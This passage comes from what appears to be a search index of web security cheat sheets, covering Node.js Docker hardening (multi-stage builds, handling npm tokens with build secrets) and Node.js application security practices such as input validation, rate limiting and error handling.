async function closeGracefully(signal) {\n   console.log(`*^!@4=> Received signal to terminate: ${signal}`)\n\n   await fastify.close()\n   // await db.close() if we have a db connection in this app\n   // await other things we should cleanup nicely\n   process.exit()\n}\nprocess.on('SIGINT', closeGracefully)\nprocess.on('SIGTERM', closeGracefully)\n

Admittedly, this is more of a generic web application concern than Dockerfile related, but is even more important in orchestrated environments.

"},{"location":"cheatsheets/NodeJS_Docker_Cheat_Sheet.html#7-find-and-fix-security-vulnerabilities-in-your-nodejs-docker-image","title":"7) Find and fix security vulnerabilities in your Node.js docker image","text":"

See Docker Security Cheat Sheet - Use static analysis tools

"},{"location":"cheatsheets/NodeJS_Docker_Cheat_Sheet.html#8-use-multi-stage-builds","title":"8) Use multi-stage builds","text":"

Multi-stage builds are a great way to move from a simple, yet potentially erroneous Dockerfile, into separated steps of building a Docker image, so we can avoid leaking sensitive information. Not only that, but we can also use a bigger Docker base image to install our dependencies, compile any native npm packages if needed, and then copy all these artifacts into a small production base image, like our alpine example.

"},{"location":"cheatsheets/NodeJS_Docker_Cheat_Sheet.html#prevent-sensitive-information-leak","title":"Prevent sensitive information leak","text":"

The use-case here, avoiding a sensitive information leak, is more common than you might think.

If you\u2019re building Docker images for work, there\u2019s a high chance that you also maintain private npm packages. If that\u2019s the case, then you probably needed to find some way to make that secret NPM_TOKEN available to the npm install.

Here\u2019s an example for what I\u2019m talking about:

FROM node:lts-alpine@sha256:b2da3316acdc2bec442190a1fe10dc094e7ba4121d029cb32075ff59bb27390a\nRUN apk add dumb-init\nENV NODE_ENV production\nENV NPM_TOKEN 1234\nWORKDIR /usr/src/app\nCOPY --chown=node:node . .\n#RUN npm ci --only=production\nRUN echo \"//registry.npmjs.org/:_authToken=$NPM_TOKEN\" > .npmrc && \\\n   npm ci --only=production\nUSER node\nCMD [\"dumb-init\", \"node\", \"server.js\"]\n

Doing this, however, leaves the .npmrc file with the secret npm token inside the Docker image. You could attempt to improve it by deleting it afterwards, like this:

RUN echo \"//registry.npmjs.org/:_authToken=$NPM_TOKEN\" > .npmrc && \\\n   npm ci --only=production\nRUN rm -rf .npmrc\n

However, now the .npmrc file is available in a different layer of the Docker image. If this Docker image is public, or someone is able to access it somehow, then your token is compromised. A better improvement would be as follows:

RUN echo \"//registry.npmjs.org/:_authToken=$NPM_TOKEN\" > .npmrc && \\\n   npm ci --only=production; \\\n   rm -rf .npmrc\n

The problem now is that the Dockerfile itself needs to be treated as a secret asset, because it contains the secret npm token inside it.

Luckily, Docker supports a way to pass arguments into the build process:

ARG NPM_TOKEN\nRUN echo \"//registry.npmjs.org/:_authToken=$NPM_TOKEN\" > .npmrc && \\\n   npm ci --only=production; \\\n   rm -rf .npmrc\n

And then we build it as follows:

$ docker build . -t nodejs-tutorial --build-arg NPM_TOKEN=1234

I know you were thinking that we\u2019re all done at this point, but sorry to disappoint \ud83d\ude42

That\u2019s how it is with security: sometimes the obvious thing is just another pitfall.

What\u2019s the problem now, you may wonder? Build arguments passed to Docker like that are kept in the history log. Let\u2019s see with our own eyes. Run this command:

$ docker history nodejs-tutorial

which prints the following:

IMAGE          CREATED              CREATED BY                                      SIZE      COMMENT\nb4c2c78acaba   About a minute ago   CMD [\"dumb-init\" \"node\" \"server.js\"]            0B        buildkit.dockerfile.v0\n<missing>      About a minute ago   USER node                                       0B        buildkit.dockerfile.v0\n<missing>      About a minute ago   RUN |1 NPM_TOKEN=1234 /bin/sh -c echo \"//reg\u2026   5.71MB    buildkit.dockerfile.v0\n<missing>      About a minute ago   ARG NPM_TOKEN                                   0B        buildkit.dockerfile.v0\n<missing>      About a minute ago   COPY . . # buildkit                             15.3kB    buildkit.dockerfile.v0\n<missing>      About a minute ago   WORKDIR /usr/src/app                            0B        buildkit.dockerfile.v0\n<missing>      About a minute ago   ENV NODE_ENV=production                         0B        buildkit.dockerfile.v0\n<missing>      About a minute ago   RUN /bin/sh -c apk add dumb-init # buildkit     1.65MB    buildkit.dockerfile.v0\n

Did you spot the secret npm token there? That\u2019s what I mean.

There is a better way to manage secrets for the container image, but this is a good time to introduce multi-stage builds as a mitigation for this issue, as well as a way to build minimal images.

"},{"location":"cheatsheets/NodeJS_Docker_Cheat_Sheet.html#introducing-multi-stage-builds-for-nodejs-docker-images","title":"Introducing multi-stage builds for Node.js Docker images","text":"

Just like the Separation of Concerns principle in software development, we\u2019ll apply the same idea in order to build our Node.js Docker images. We\u2019ll have one image that we use to build everything that we need for the Node.js application to run, which in a Node.js world means installing npm packages, and compiling native npm modules if necessary. That will be our first stage.

The second Docker image, representing the second stage of the Docker build, will be the production Docker image. This second and last stage is the image that we actually optimize for and publish to a registry, if we have one. That first image, which we\u2019ll refer to as the build image, gets discarded and is left as a dangling image in the Docker host that built it, until it gets cleaned up.

Here is the update to our Dockerfile that represents our progress so far, but separated into two stages:

# --------------> The build image\nFROM node:latest AS build\nARG NPM_TOKEN\nWORKDIR /usr/src/app\nCOPY package*.json /usr/src/app/\nRUN echo \"//registry.npmjs.org/:_authToken=$NPM_TOKEN\" > .npmrc && \\\n   npm ci --only=production && \\\n   rm -f .npmrc\n\n# --------------> The production image\nFROM node:lts-alpine@sha256:b2da3316acdc2bec442190a1fe10dc094e7ba4121d029cb32075ff59bb27390a\nRUN apk add dumb-init\nENV NODE_ENV production\nUSER node\nWORKDIR /usr/src/app\nCOPY --chown=node:node --from=build /usr/src/app/node_modules /usr/src/app/node_modules\nCOPY --chown=node:node . /usr/src/app\nCMD [\"dumb-init\", \"node\", \"server.js\"]\n

As you can see, I chose a bigger image for the build stage because I might need tooling like gcc (the GNU Compiler Collection) to compile native npm packages, or for other needs.

In the second stage, there\u2019s a special notation for the COPY directive that copies the node_modules/ folder from the build Docker image into this new production base image.

Also, do you see the NPM_TOKEN that was passed as a build argument to the intermediary build image? It\u2019s no longer visible in the docker history nodejs-tutorial command output because it doesn\u2019t exist in our production Docker image.

"},{"location":"cheatsheets/NodeJS_Docker_Cheat_Sheet.html#9-keeping-unnecessary-files-out-of-your-nodejs-docker-images","title":"9) Keeping unnecessary files out of your Node.js Docker images","text":"

You have a .gitignore file to avoid polluting the git repository with unnecessary files, and potentially sensitive files too, right? The same applies to Docker images.

Docker has a .dockerignore file which ensures that files matching the glob patterns inside it are not sent to the Docker daemon. Here is a list of files to give you an idea of what you might be putting into your Docker image that we\u2019d ideally want to avoid:

.dockerignore\nnode_modules\nnpm-debug.log\nDockerfile\n.git\n.gitignore\n

As you can see, the node_modules/ is actually quite important to skip because if we hadn\u2019t ignored it, then the simplistic Dockerfile version that we started with would have caused the local node_modules/ folder to be copied over to the container as-is.

FROM node@sha256:b2da3316acdc2bec442190a1fe10dc094e7ba4121d029cb32075ff59bb27390a\nWORKDIR /usr/src/app\nCOPY . /usr/src/app\nRUN npm install\nCMD \"npm\" \"start\"\n

In fact, it\u2019s even more important to have a .dockerignore file when you are practicing multi-stage Docker builds. To refresh your memory on what the 2nd stage of the Docker build looks like:

# --------------> The production image\nFROM node:lts-alpine\nRUN apk add dumb-init\nENV NODE_ENV production\nUSER node\nWORKDIR /usr/src/app\nCOPY --chown=node:node --from=build /usr/src/app/node_modules /usr/src/app/node_modules\nCOPY --chown=node:node . /usr/src/app\nCMD [\"dumb-init\", \"node\", \"server.js\"]\n

The importance of having a .dockerignore is that when we do a COPY . /usr/src/app from the 2nd Dockerfile stage, we\u2019re also copying over any local node_modules/ to the Docker image. That\u2019s a big no-no as we may be copying over modified source code inside node_modules/.

On top of that, since we\u2019re using the wildcard COPY . we may also be copying into the Docker image sensitive files that include credentials or local configuration.

The take-away here is to use a .dockerignore file so that unnecessary, and potentially sensitive, files never end up in your Docker images.

"},{"location":"cheatsheets/NodeJS_Docker_Cheat_Sheet.html#10-mounting-secrets-into-the-docker-build-image","title":"10) Mounting secrets into the Docker build image","text":"

One thing to note about the .dockerignore file is that it is an all or nothing approach and can\u2019t be turned on or off per build stages in a Docker multi-stage build.

Why is it important? Ideally, we would want to use the .npmrc file in the build stage, as we may need it because it includes a secret npm token to access private npm packages. Perhaps it also needs a specific proxy or registry configuration to pull packages from.

This means that it makes sense to have the .npmrc file available to the build stage\u2014however, we don\u2019t need it at all in the second stage for the production image, nor do we want it there as it may include sensitive information, like the secret npm token.

One way to mitigate this .dockerignore caveat is to mount a local file system that will be available for the build stage, but there\u2019s a better way.

Docker supports a relatively new capability referred to as Docker secrets, which is a natural fit for what we need with .npmrc: the secret file is mounted only for the build step that needs it and does not end up in the image layers.

Let\u2019s see how all of it works together. First the updated .dockerignore file:

.dockerignore\nnode_modules\nnpm-debug.log\nDockerfile\n.git\n.gitignore\n.npmrc\n

Then, the complete Dockerfile, with the updated RUN directive to install npm packages while specifying the .npmrc mount point:

# --------------> The build image\nFROM node:latest AS build\nWORKDIR /usr/src/app\nCOPY package*.json /usr/src/app/\nRUN --mount=type=secret,mode=0644,id=npmrc,target=/usr/src/app/.npmrc npm ci --only=production\n\n# --------------> The production image\nFROM node:lts-alpine\nRUN apk add dumb-init\nENV NODE_ENV production\nUSER node\nWORKDIR /usr/src/app\nCOPY --chown=node:node --from=build /usr/src/app/node_modules /usr/src/app/node_modules\nCOPY --chown=node:node . /usr/src/app\nCMD [\"dumb-init\", \"node\", \"server.js\"]\n

And finally, the command that builds the Node.js Docker image:

docker build . -t nodejs-tutorial --secret id=npmrc,src=.npmrc\n

Note: Secrets are a newer feature in Docker and if you\u2019re using an older version, you might need to enable BuildKit as follows:

DOCKER_BUILDKIT=1 docker build . -t nodejs-tutorial --secret id=npmrc,src=.npmrc\n
"},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html","title":"NodeJS Security Cheat Sheet","text":""},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#introduction","title":"Introduction","text":"

This cheat sheet lists actions developers can take to develop secure Node.js applications. Each item has a brief explanation and solution that is specific to the Node.js environment.

"},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#context","title":"Context","text":"

Node.js applications are increasing in number and they are no different from other frameworks and programming languages: Node.js applications are prone to all kinds of web application vulnerabilities.

"},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#objective","title":"Objective","text":"

This cheat sheet aims to provide a list of best practices to follow during development of Node.js applications.

"},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#recommendations","title":"Recommendations","text":"

There are several recommendations to enhance the security of your Node.js applications. These are categorized as: Application Security, Error & Exception Handling, Server Security, and Platform Security.

"},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#application-security","title":"Application Security","text":""},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#use-flat-promise-chains","title":"Use flat Promise chains","text":"

Asynchronous callback functions are one of the strongest features of Node.js. However, increasing layers of nesting within callback functions can become a problem. Any multistage process can become nested 10 or more levels deep. This problem is referred to as a \"Pyramid of Doom\" or \"Callback Hell\". In such code, the errors and results get lost within the callbacks. Promises are a good way to write asynchronous code without getting into nested pyramids. Promises provide top-down execution while being asynchronous by delivering errors and results to the next .then function.

Another advantage of Promises is the way Promises handle errors. If an error occurs in a Promise chain, it skips over the .then functions and invokes the first .catch function it finds. This way Promises provide a higher assurance of capturing and handling errors. As a principle, you can make all your asynchronous code (apart from emitters) return promises. It should be noted that Promise calls can also become a pyramid. In order to completely stay away from \"Callback Hell\", flat Promise chains should be used. If the module you are using does not support Promises, you can convert the base object to a Promise by using the Promise.promisifyAll() function.

The following code snippet is an example of \"Callback Hell\":

function func1(name, callback) {\n// operations that takes a bit of time and then calls the callback\n}\nfunction func2(name, callback) {\n// operations that takes a bit of time and then calls the callback\n}\nfunction func3(name, callback) {\n// operations that takes a bit of time and then calls the callback\n}\nfunction func4(name, callback) {\n// operations that takes a bit of time and then calls the callback\n}\n\nfunc1(\"input1\", function(err, result1){\nif(err){\n// error operations\n}\nelse {\n//some operations\nfunc2(\"input2\", function(err, result2){\nif(err){\n//error operations\n}\nelse{\n//some operations\nfunc3(\"input3\", function(err, result3){\nif(err){\n//error operations\n}\nelse{\n// some operations\nfunc4(\"input 4\", function(err, result4){\nif(err){\n// error operations\n}\nelse {\n// some operations\n}\n});\n}\n});\n}\n});\n}\n});\n

The above code can be securely written as follows using a flat Promise chain:

function func1(name) {\n// operations that takes a bit of time and then resolves the promise\n}\nfunction func2(name) {\n// operations that takes a bit of time and then resolves the promise\n}\nfunction func3(name) {\n// operations that takes a bit of time and then resolves the promise\n}\nfunction func4(name) {\n// operations that takes a bit of time and then resolves the promise\n}\n\nfunc1(\"input1\")\n.then(function (result){\nreturn func2(\"input2\");\n})\n.then(function (result){\nreturn func3(\"input3\");\n})\n.then(function (result){\nreturn func4(\"input4\");\n})\n.catch(function (error) {\n// error operations\n});\n

And using async/await:

async function func1(name) {\n// operations that take a bit of time and then resolve the promise\n}\nasync function func2(name) {\n// operations that take a bit of time and then resolve the promise\n}\nasync function func3(name) {\n// operations that take a bit of time and then resolve the promise\n}\nasync function func4(name) {\n// operations that take a bit of time and then resolve the promise\n}\n\n(async() => {\ntry {\nlet res1 = await func1(\"input1\");\nlet res2 = await func2(\"input2\");\nlet res3 = await func3(\"input3\");\nlet res4 = await func4(\"input4\");\n} catch(err) {\n// error operations\n}\n})();\n
"},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#set-request-size-limits","title":"Set request size limits","text":"

Buffering and parsing of request bodies can be a resource intensive task. If there is no limit on the size of requests, attackers can send requests with large request bodies that can exhaust server memory and/or fill disk space. You can limit the request body size for all requests using raw-body.

const contentType = require('content-type')\nconst express = require('express')\nconst getRawBody = require('raw-body')\n\nconst app = express()\n\napp.use(function (req, res, next) {\nif (!['POST', 'PUT', 'DELETE'].includes(req.method)) {\nnext()\nreturn\n}\n\ngetRawBody(req, {\nlength: req.headers['content-length'],\nlimit: '1kb',\nencoding: contentType.parse(req).parameters.charset\n}, function (err, string) {\nif (err) return next(err)\nreq.text = string\nnext()\n})\n})\n

However, fixing a request size limit for all requests may not be the correct behavior, since some requests may have a large payload in the request body, such as when uploading a file. Also, input with a JSON type is more dangerous than a multipart input, since parsing JSON is a blocking operation. Therefore, you should set request size limits for different content types. You can accomplish this very easily with express middleware as follows:

app.use(express.urlencoded({ extended: true, limit: \"1kb\" }));\napp.use(express.json({ limit: \"1kb\" }));\n

It should be noted that attackers can change the Content-Type header of the request and bypass request size limits. Therefore, before processing the request, data contained in the request should be validated against the content type stated in the request headers. If content type validation for each request severely affects performance, you can validate only specific content types, or only requests larger than a predetermined size.
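
For example, a minimal sketch (an illustration, not taken from this cheat sheet; the /api/data route is hypothetical) that rejects bodies whose declared content type does not match what the route expects before any parsing happens:

const express = require('express');\nconst app = express();\n\n// Hypothetical route: refuse to parse bodies whose declared type is not JSON\napp.post('/api/data', (req, res, next) => {\nif (!req.is('application/json')) {\nreturn res.status(415).send('Unsupported Media Type');\n}\nnext();\n}, express.json({ limit: '1kb' }), (req, res) => {\nres.json({ received: req.body });\n});\n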

"},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#do-not-block-the-event-loop","title":"Do not block the event loop","text":"

Node.js is very different from common application platforms that use threads. Node.js has a single-thread event-driven architecture. By means of this architecture, throughput becomes high and the programming model becomes simpler. Node.js is implemented around a non-blocking I/O event loop. With this event loop, there is no waiting on I/O or context switching. The event loop looks for events and dispatches them to handler functions. Because of this, when CPU intensive JavaScript operations are executed, the event loop waits for them to finish. This is why such operations are called \"blocking\". To overcome this problem, Node.js allows assigning callbacks to IO-blocked events. This way, the main application is not blocked and callbacks run asynchronously. Therefore, as a general principle, all blocking operations should be done asynchronously so that the event loop is not blocked.

Even if you perform blocking operations asynchronously, your application may still not serve as expected. This happens if there is code outside the callback that relies on the code within the callback running first. For example, consider the following code:

const fs = require('fs');\nfs.readFile('/file.txt', (err, data) => {\n// perform actions on file content\n});\nfs.unlinkSync('/file.txt');\n

In the above example, the unlinkSync function may run before the callback, which will delete the file before the desired actions on the file content are done. Such race conditions can also affect the security of your application. An example would be a scenario where authentication is performed in a callback and authenticated actions are run synchronously. In order to eliminate such race conditions, you can write all operations that rely on each other in a single non-blocking function. By doing so, you can guarantee that all operations are executed in the correct order. For example, the above code example can be written in a non-blocking way as follows:

const fs = require('fs');\nfs.readFile('/file.txt', (err, data) => {\n// perform actions on file content\nfs.unlink('/file.txt', (err) => {\nif (err) throw err;\n});\n});\n

In the above code, the call to unlink the file and the other file operations are within the same callback. This provides the correct order of operations.

"},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#perform-input-validation","title":"Perform input validation","text":"

Input validation is a crucial part of application security. Input validation failures can result in many types of application attacks. These include SQL Injection, Cross-Site Scripting, Command Injection, Local/Remote File Inclusion, Denial of Service, Directory Traversal, LDAP Injection and many other injection attacks. In order to avoid these attacks, input to your application should be sanitized first. The best input validation technique is to use a list of accepted inputs. However, if this is not possible, input should be first checked against expected input scheme and dangerous inputs should be escaped. In order to ease input validation in Node.js applications, there are some modules like validator and mongo-express-sanitize. For detailed information on input validation, please refer to Input Validation Cheat Sheet.
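
As a brief illustration, the following sketch assumes the validator npm package mentioned above (the field names and rules are illustrative, not part of the original text); it checks an email against the expected scheme and escapes a free-text field before further use:

const validator = require('validator');\n\nfunction validateSignup(input) {\n// accept only values that match the expected scheme\nif (!validator.isEmail(input.email)) {\nthrow new Error('Invalid email address');\n}\n// escape potentially dangerous characters in free-text input\nreturn {\nemail: validator.normalizeEmail(input.email),\nbio: validator.escape(input.bio)\n};\n}\n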

JavaScript is a dynamic language and depending on how the framework parses a URL, the data seen by the application code can take many forms. Here are some examples after parsing a query string in express.js:

URL -> Content of request.query.foo in code
?foo=bar -> 'bar' (string)
?foo=bar&foo=baz -> ['bar', 'baz'] (array of string)
?foo[]=bar -> ['bar'] (array of string)
?foo[]=bar&foo[]=baz -> ['bar', 'baz'] (array of string)
?foo[bar]=baz -> { bar : 'baz' } (object with a key)
?foo[]=bar -> ['bar'] (array of string)
?foo[]baz=bar -> ['bar'] (array of string - postfix is lost)
?foo[][baz]=bar -> [ { baz: 'bar' } ] (array of object)
?foo[bar][baz]=bar -> { foo: { bar: { baz: 'bar' } } } (object tree)
?foo[10]=bar&foo[9]=baz -> [ 'baz', 'bar' ] (array of string - notice order)
?foo[toString]=bar -> {} (object where calling toString() will fail)"},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#perform-output-escaping","title":"Perform output escaping","text":"

In addition to input validation, you should escape all HTML and JavaScript content shown to users via the application in order to prevent cross-site scripting (XSS) attacks. You can use the escape-html or node-esapi libraries to perform output escaping.
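
For example, a minimal sketch using the escape-html package mentioned above (the express route and query parameter are illustrative assumptions):

const express = require('express');\nconst escapeHtml = require('escape-html');\nconst app = express();\n\napp.get('/greet', (req, res) => {\n// encode user-controlled data before reflecting it into HTML\nconst name = escapeHtml(req.query.name || 'guest');\nres.send('<p>Hello ' + name + '</p>');\n});\n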

"},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#perform-application-activity-logging","title":"Perform application activity logging","text":"

Logging application activity is an encouraged good practice. It makes it easier to debug any errors encountered during application runtime. It is also useful for security concerns, since it can be used during incident response. In addition, these logs can be used to feed Intrusion Detection/Prevention Systems (IDS/IPS). In Node.js, there are modules such as Winston, Bunyan, or Pino to perform application activity logging. These modules enable streaming and querying logs, and they provide a way to handle uncaught exceptions.

With the following code, you can log application activities in both console and a desired log file:

const winston = require('winston');\n\nconst logger = new (winston.Logger)({\ntransports: [\nnew (winston.transports.Console)(),\nnew (winston.transports.File)({ filename: 'application.log' })\n],\nlevel: 'verbose'\n});\n

You can provide different transports so that you can save errors to a separate log file and general application logs to a different log file. Additional information on security logging can be found in Logging Cheat Sheet.
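
For instance, a sketch of separate transports, assuming winston 3.x (where winston.createLogger replaced the Logger constructor shown above); the file names are illustrative:

const winston = require('winston');\n\nconst logger = winston.createLogger({\ntransports: [\n// only error-level entries go to the error log\nnew winston.transports.File({ filename: 'error.log', level: 'error' }),\n// everything at info level and above goes to the combined log\nnew winston.transports.File({ filename: 'combined.log', level: 'info' })\n]\n});\n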

"},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#monitor-the-event-loop","title":"Monitor the event loop","text":"

When your application server is under heavy network traffic, it may not be able to serve its users. This is essentially a type of Denial of Service (DoS) attack. The toobusy-js module allows you to monitor the event loop. It keeps track of the response time, and when it goes beyond a certain threshold, this module can indicate your server is too busy. In that case, you can stop processing incoming requests and send them a 503 Server Too Busy message so that your application stays responsive. Example use of the toobusy-js module is shown here:

const toobusy = require('toobusy-js');\nconst express = require('express');\nconst app = express();\napp.use(function(req, res, next) {\nif (toobusy()) {\n// log if you see necessary\nres.status(503).send(\"Server Too Busy\");\n} else {\nnext();\n}\n});\n
"},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#take-precautions-against-brute-forcing","title":"Take precautions against brute-forcing","text":"

Brute-forcing is a common threat to all web applications. Attackers can use brute-forcing as a password guessing attack to obtain account passwords. Therefore, application developers should take precautions against brute-force attacks, especially on login pages. Node.js has several modules available for this purpose. Express-bouncer, express-brute and rate-limiter are just some examples. Based on your needs and requirements, you should choose one or more of these modules and use them accordingly. The express-bouncer and express-brute modules work similarly. They increase the delay for each failed request and can be arranged for a specific route. These modules can be used as follows:

const bouncer = require('express-bouncer');\nbouncer.whitelist.push('127.0.0.1'); // allow an IP address\n// give a custom error message\nbouncer.blocked = function (req, res, next, remaining) {\nres.status(429).send(\"Too many requests have been made. Please wait \" + remaining/1000 + \" seconds.\");\n};\n// route to protect\napp.post(\"/login\", bouncer.block, function(req, res) {\nif (LoginFailed){  }\nelse {\nbouncer.reset( req );\n}\n});\n
const ExpressBrute = require('express-brute');\n\nconst store = new ExpressBrute.MemoryStore(); // stores state locally, don't use this in production\nconst bruteforce = new ExpressBrute(store);\n\napp.post('/auth',\nbruteforce.prevent, // error 429 if we hit this route too often\nfunction (req, res, next) {\nres.send('Success!');\n}\n);\n

Apart from express-bouncer and express-brute, the rate-limiter module can also help to prevent brute-forcing attacks. It enables specifying how many requests a specific IP address can make during a specified time period.

const limiter = new RateLimiter();\nlimiter.addLimit('/login', 'GET', 5, 500); // login page can be requested 5 times at max within 500 seconds\n

CAPTCHA usage is also another common mechanism used against brute-forcing. There are modules developed for Node.js CAPTCHAs. A common module used in Node.js applications is svg-captcha. It can be used as follows:

const svgCaptcha = require('svg-captcha');\napp.get('/captcha', function (req, res) {\nconst captcha = svgCaptcha.create();\nreq.session.captcha = captcha.text;\nres.type('svg');\nres.status(200).send(captcha.data);\n});\n

Account lockout is a recommended solution to keep attackers away from your valid users. Account lockout is possible with many modules like mongoose. You can refer to this blog post to see how account lockout is implemented in mongoose.
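
A minimal sketch of the idea (assuming mongoose; the schema fields, attempt threshold and lock duration are illustrative and not taken from the referenced blog post):

const mongoose = require('mongoose');\n\nconst userSchema = new mongoose.Schema({\nusername: String,\npassword: String,\nloginAttempts: { type: Number, default: 0 },\nlockUntil: Number // timestamp until which the account is locked\n});\n\nuserSchema.methods.isLocked = function () {\nreturn this.lockUntil && this.lockUntil > Date.now();\n};\n\nuserSchema.methods.registerFailedLogin = function () {\nthis.loginAttempts += 1;\nif (this.loginAttempts >= 5) {\n// lock the account for one hour after too many failures\nthis.lockUntil = Date.now() + 60 * 60 * 1000;\n}\nreturn this.save();\n};\n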

"},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#use-anti-csrf-tokens","title":"Use Anti-CSRF tokens","text":"

Cross-Site Request Forgery (CSRF) aims to perform authorized actions on behalf of an authenticated user, while the user is unaware of this action. CSRF attacks are generally performed for state-changing requests like changing a password, adding users or placing orders. Csurf is an express middleware that was used to mitigate CSRF attacks, but a security hole was recently discovered in this package. The team behind the package has not fixed the discovered vulnerability and has marked the package as deprecated, recommending the use of another CSRF protection package.

For detailed information on cross-site request forgery (CSRF) attacks and prevention methods, you can refer to Cross-Site Request Forgery Prevention.

"},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#remove-unnecessary-routes","title":"Remove unnecessary routes","text":"

A web application should not contain any page that is not used by users, as it may increase the attack surface of the application. Therefore, all unused API routes should be disabled in Node.js applications. This occurs especially in frameworks like Sails and Feathers, as they automatically generate REST API endpoints. For example, in Sails, if a URL does not match a custom route, it may match one of the automatic routes and still generate a response. This situation may lead to results ranging from information leakage to arbitrary command execution. Therefore, before using such frameworks and modules, it is important to know the routes they automatically generate and remove or disable these routes.

"},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#prevent-http-parameter-pollution","title":"Prevent HTTP Parameter Pollution","text":"

HTTP Parameter Pollution (HPP) is an attack in which attackers send multiple HTTP parameters with the same name, causing your application to interpret them unpredictably. When multiple parameter values are sent, Express populates them in an array. In order to solve this issue, you can use the hpp module. When used, this module will ignore all values submitted for a parameter in req.query and/or req.body and just select the last parameter value submitted. You can use it as follows:

const hpp = require('hpp');\napp.use(hpp());\n
"},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#only-return-what-is-necessary","title":"Only return what is necessary","text":"

Information about the users of an application is among the most critical information about the application. User tables generally include fields like id, username, full name, email address, birth date, password and in some cases social security numbers. Therefore, when querying and using user objects, you should return only the fields that are needed, as returning complete objects may lead to personal information disclosure. This also applies to other objects stored in the database. If you just need a certain field of an object, you should return only the specific fields required. As an example, you can use a function like the following whenever you need to get information on a user. By doing so, you return only the fields that are needed for your specific operation. In other words, if you only need to list the names of the available users, you do not return their email addresses or credit card numbers in addition to their full names.

exports.sanitizeUser = function(user) {\nreturn {\nid: user.id,\nusername: user.username,\nfullName: user.fullName\n};\n};\n
"},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#use-object-property-descriptors","title":"Use object property descriptors","text":"

Object properties include three hidden attributes: writable (if false, the property value cannot be changed), enumerable (if false, the property cannot be used in for...in loops) and configurable (if false, the property cannot be deleted). When defining an object property through assignment, these three hidden attributes are set to true by default. These attributes can be set as follows:

const o = {};\nObject.defineProperty(o, \"a\", {\nwritable: true,\nenumerable: true,\nconfigurable: true,\nvalue: \"A\"\n});\n

Apart from these, there are some special functions for object attributes. Object.preventExtensions() prevents new properties from being added to the object.
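
For example, a short sketch of Object.preventExtensions() in action (the object and property names are illustrative; in strict mode the rejected assignment throws a TypeError instead of failing silently):

'use strict';\n\nconst account = { balance: 100 };\nObject.preventExtensions(account);\n\ntry {\naccount.owner = 'alice'; // adding a new property is rejected\n} catch (e) {\nconsole.log(e instanceof TypeError); // true\n}\nconsole.log(Object.isExtensible(account)); // false\n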

"},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#use-access-control-lists","title":"Use access control lists","text":"

Authorization prevents users from acting outside of their intended permissions. In order to do so, users and their roles should be determined with consideration of the principle of least privilege. Each user role should only have access to the resources they must use. For your Node.js applications, you can use the acl module to provide ACL (access control list) implementation. With this module, you can create roles and assign users to these roles.
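
A brief sketch of the idea (assuming the acl module's documented in-memory backend and its allow/addUserRoles/isAllowed API; the roles, resources and user id are illustrative):

const ACL = require('acl');\nconst acl = new ACL(new ACL.memoryBackend()); // don't use the memory backend in production\n\n// admins may read, create and delete users; guests may only read\nacl.allow('admin', 'users', ['get', 'post', 'delete']);\nacl.allow('guest', 'users', 'get');\n\nacl.addUserRoles('some-user-id', 'guest');\n\nacl.isAllowed('some-user-id', 'users', 'delete', (err, allowed) => {\nconsole.log(allowed); // false\n});\n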

"},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#error-exception-handling","title":"Error & Exception Handling","text":""},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#handle-uncaughtexception","title":"Handle uncaughtException","text":"

Node.js behavior for uncaught exceptions is to print the current stack trace and then terminate the process. However, Node.js allows customization of this behavior. It provides a global object named process that is available to all Node.js applications. It is an EventEmitter object and, in case of an uncaught exception, the uncaughtException event is emitted and brought up to the main event loop. In order to provide a custom behavior for uncaught exceptions, you can bind to this event. However, resuming the application after such an uncaught exception can lead to further problems. Therefore, if you do not want to miss any uncaught exception, you should bind to the uncaughtException event and clean up any allocated resources like file descriptors, handles and similar before shutting down the process. Resuming the application is strongly discouraged as the application will be in an unknown state. It is important to note that when displaying error messages to the user in case of an uncaught exception, detailed information like stack traces should not be revealed to the user. Instead, custom error messages should be shown to the users in order not to cause any information leakage.

process.on(\"uncaughtException\", function(err) {\n// clean up allocated resources\n// log necessary error details to log files\nprocess.exit(); // exit the process to avoid unknown state\n});\n
"},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#listen-to-errors-when-using-eventemitter","title":"Listen to errors when using EventEmitter","text":"

When using EventEmitter, errors can occur anywhere in the event chain. Normally, if an error occurs in an EventEmitter object, an error event that has an Error object as an argument is emitted. However, if there are no attached listeners to that error event, the Error object that is sent as an argument is thrown and becomes an uncaught exception. In short, if you do not handle errors within an EventEmitter object properly, these unhandled errors may crash your application. Therefore, you should always listen to error events when using EventEmitter objects.

const events = require('events');\nconst myEventEmitter = function(){\nevents.EventEmitter.call(this);\n}\nrequire('util').inherits(myEventEmitter, events.EventEmitter);\nmyEventEmitter.prototype.someFunction = function(param1, param2) {\n//in case of an error\nthis.emit('error', err);\n}\nconst emitter = new myEventEmitter();\nemitter.on('error', function(err){\n//Perform necessary error handling here\n});\n
"},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#handle-errors-in-asynchronous-calls","title":"Handle errors in asynchronous calls","text":"

Errors that occur within asynchronous callbacks are easy to miss. Therefore, as a general principle, the first argument to asynchronous callbacks should be an Error object. Also, express routes handle errors themselves, but it should always be remembered that errors occurring in asynchronous calls made within express routes are not handled, unless an Error object is sent as the first argument.

Errors in these callbacks can be propagated multiple times. Each callback that the error has been propagated to can ignore, handle or propagate the error.
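
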